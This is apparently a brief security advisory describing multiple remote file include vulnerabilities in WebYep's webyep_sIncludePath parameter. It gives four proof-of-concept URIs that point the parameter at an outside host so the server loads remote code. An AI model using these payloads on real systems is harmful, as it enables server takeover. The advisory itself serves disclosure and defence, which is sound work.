WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities

WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/webyep.php?webyep_sIncludePath=http://www.example.com?
http://www.example.com/[webYep_path]/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://www.example.com?